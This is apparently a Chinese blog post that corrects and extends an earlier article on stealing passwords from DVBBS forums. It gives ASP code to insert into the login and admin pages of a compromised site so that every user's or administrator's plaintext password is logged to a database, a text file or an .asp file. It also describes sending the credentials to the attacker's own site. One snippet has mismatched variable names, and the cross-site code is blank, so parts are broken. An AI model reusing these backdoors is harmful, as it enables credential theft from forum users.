关于"截取动网BBS的用户密码"一文的校正

原文说:要在它验证的前面得到它的密码,所以,我在Function Dvbbs_ChkLogin
后面加上Code:
dim dbpath,rstmp,str,rs,con
   set con=server.createobject("adodb.connection")
   DBPath = Server.MapPath("example.mdb")
   con.Open "driver={ Microsoft Access Driver (*.mdb) };dbq=" & DBPath
  
  
  
   set rstmp=server.createobject("adodb.recordset")
  
   username = Request.form("username")
   password = Request.form("password")
  
   str="insert Into User (username,password) v alues('"& username &"','"& password &"')"
   con.execute(str)

这句话说得不是太明白,我经过测试发现应该是在
Function Dvbbs_ChkLogin
。。。
End Function中间插入上面的代码,但是上面的代码写得不规范,调试时总是出错,最明显的“v alues”也写分开了。
我把代码调整了一下,如下:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("bbs.mdb")
con.Open "driver={Microsoft Access Driver (*.mdb)};dbq="&DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) values('"&username&"','"&password&"')"
con.execute(str)




写一个关于TXT的吧!!今天在918X哪里看到 下文:
我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码

这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。

新办法:

方法一:login.asp中Case "chk"下:
   on error resume next
   dim rain
   set lP=server.CreateObject("Adodb.Stream")
   rain.Open
   rain.Type=2
   rain.CharSet="gb2312"
   rain.LoadFromFile server.mapPath("918.asp")
   rain.Position=lp.Size
   rain.writetext now&request("username")&"text:"&request("password")&chr(10)
   rain.SaveToFile server.mapPath("918.asp"),2
   rain.Close
   set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:


  在login.asp那里插入一句: response.write "" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高

阅读更多
个人分类: 脚本编程
上一篇截取动网BBS的用户密码
下一篇目前最快的分页..十万数据也在10~20Ms
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭
关闭